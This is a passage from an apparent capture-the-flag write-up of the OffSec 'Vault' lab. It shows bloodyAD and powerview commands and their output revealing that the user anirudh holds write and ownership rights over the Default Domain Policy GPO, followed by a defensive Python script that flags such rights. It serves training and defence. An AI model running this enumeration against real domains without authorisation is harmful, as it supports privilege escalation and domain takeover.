Group Policy Object


During the BloodHound enumeration, it was identified that the anirudh user holds extensive rights (WriteDacl, WriteOwner and GenericWrite) over the Default Domain Policy object, a GPO that applies to the whole target domain.

Confirmation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache bloodyAD -d VAULT.OFFSEC -k --host dc.vault.offsec --dc-ip $IP get writable
 
distinguishedName: CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
 
distinguishedName: CN=User,CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
 
distinguishedName: CN=Machine,CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
 
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=vault,DC=offsec
permission: WRITE
 
distinguishedName: CN=Anirudh,CN=Users,DC=vault,DC=offsec
permission: WRITE
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache powerview VAULT.OFFSEC/anirudh@dc.vault.offsec -k --no-pass --dc-ip $IP -q 'Get-ObjectAcl -SecurityIdentifier anirudh -ResolveGUIDs'
Logging directory is set to /home/kali/.powerview/logs/vault-anirudh-dc.vault.offsec
[2025-05-02 17:16:27] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-05-02 17:16:27] User anirudh has adminCount attribute set to 1. Might be admin somewhere somehow :)
[2025-05-02 17:16:27] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN                    : CN=Machine,CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights       : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
AccessMask                  : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
InheritanceType             : None
SecurityIdentifier          : VAULT\anirudh
 
ObjectDN                    : CN=User,CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights       : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
AccessMask                  : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
InheritanceType             : None
SecurityIdentifier          : VAULT\anirudh
 
ObjectDN                    : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE
ActiveDirectoryRights       : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
AccessMask                  : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
InheritanceType             : None
SecurityIdentifier          : VAULT\anirudh

This is confirmed by both powerview and bloodyAD: every result points to the same DN, CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache powerview VAULT.OFFSEC/anirudh@dc.vault.offsec -k --no-pass --dc-ip $IP -q 'Get-DomainGPO -Identity 31B2F340-016D-11D2-945F-00C04FB984F9'
Logging directory is set to /home/kali/.powerview/logs/vault-anirudh-dc.vault.offsec
[2025-05-02 18:26:59] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-05-02 18:26:59] User anirudh has adminCount attribute set to 1. Might be admin somewhere somehow :)
objectClass                  : top
                               container
                               groupPolicyContainer
cn                           : {31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedName            : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
instanceType                 : 4
whenCreated                  : 19/11/2021 08:50:33 (3 years, 5 months ago)
whenChanged                  : 19/11/2021 09:00:32 (3 years, 5 months ago)
displayName                  : Default Domain Policy
uSNCreated                   : 5672
uSNChanged                   : 12778
showInAdvancedViewOnly       : TRUE
name                         : {31B2F340-016D-11D2-945F-00C04FB984F9}
objectGUID                   : {93130581-3375-49c7-88d3-afdc915a9526}
flags                        : 0
versionNumber                : 4
systemFlags                  : -1946157056
objectCategory               : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec
isCriticalSystemObject       : TRUE
gPCFunctionalityVersion      : 2
gPCFileSysPath               : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
gPCMachineExtensionNames     : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A
                               4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6
                               AB1B-2488-11D1-A28C-00C04FB94F17}]
dSCorePropagationData        : 20211119090032.0Z
                               20211119085114.0Z
                               16010101000000.0Z

Querying for the CN, 31B2F340-016D-11D2-945F-00C04FB984F9, reveals that it is indeed the Default Domain Policy object. Many tools exist for manipulating a GPO, and write access over one that applies to the domain controllers mostly leads to a complete domain compromise.
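As an added defensive check (not part of the original writeup), the script below parses the record layout that powerview's Get-ObjectAcl prints and flags control-equivalent rights on GPO objects that are held by principals outside the expected administrative set. The sample output is constructed: the anirudh record mirrors the one shown above, the other two records are made up as benign controls.

```python
import re

# Constructed sample in the layout powerview's Get-ObjectAcl prints. The first
# record mirrors the page; the Domain Admins and user-object records are benign.
SAMPLE_ACL_OUTPUT = """\
ObjectDN                    : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
ACEType                     : ACCESS_ALLOWED_ACE
ActiveDirectoryRights       : WriteOwner,WriteDACL,ReadControl,Delete,WriteProperties,ReadProperties,ListChildObjects,DeleteChild,CreateChild
SecurityIdentifier          : VAULT\\anirudh

ObjectDN                    : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
ACEType                     : ACCESS_ALLOWED_ACE
ActiveDirectoryRights       : GenericAll
SecurityIdentifier          : VAULT\\Domain Admins

ObjectDN                    : CN=Anirudh,CN=Users,DC=vault,DC=offsec
ACEType                     : ACCESS_ALLOWED_ACE
ActiveDirectoryRights       : WriteOwner,WriteDACL
SecurityIdentifier          : VAULT\\anirudh
"""

# Rights that let the holder rewrite a GPO or take over its ACL.
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDACL", "WriteProperties"}
# Principals that hold such rights on GPOs by default (assumed baseline; extend per domain).
EXPECTED_HOLDERS = {"Domain Admins", "Enterprise Admins", "SYSTEM",
                    "Group Policy Creator Owners", "ENTERPRISE DOMAIN CONTROLLERS"}
# GPO containers live under CN=Policies,CN=System in the domain partition.
GPO_DN_RE = re.compile(r",CN=Policies,CN=System,DC=", re.IGNORECASE)


def parse_aces(text):
    """Split powerview's blank-line-separated ACE records into dicts."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in chunk.splitlines():
            key, _, val = line.partition(":")
            rec[key.strip()] = val.strip()
        if rec:
            records.append(rec)
    return records


def risky_gpo_aces(text):
    """Return (holder, dn, rights) for allow ACEs granting control over a GPO to unexpected principals."""
    findings = []
    for ace in parse_aces(text):
        dn = ace.get("ObjectDN", "")
        if not GPO_DN_RE.search(dn) or ace.get("ACEType") != "ACCESS_ALLOWED_ACE":
            continue
        rights = {r.strip() for r in ace.get("ActiveDirectoryRights", "").split(",")}
        holder = ace.get("SecurityIdentifier", "").split("\\")[-1]  # strip the DOMAIN\ prefix
        hit = sorted(rights & CONTROL_RIGHTS)
        if hit and holder not in EXPECTED_HOLDERS:
            findings.append((holder, dn, hit))
    return findings
```

Piping the output of a domain-wide `Get-ObjectAcl -ResolveGUIDs` run into `risky_gpo_aces` gives a quick list of GPO edit rights to review or remove.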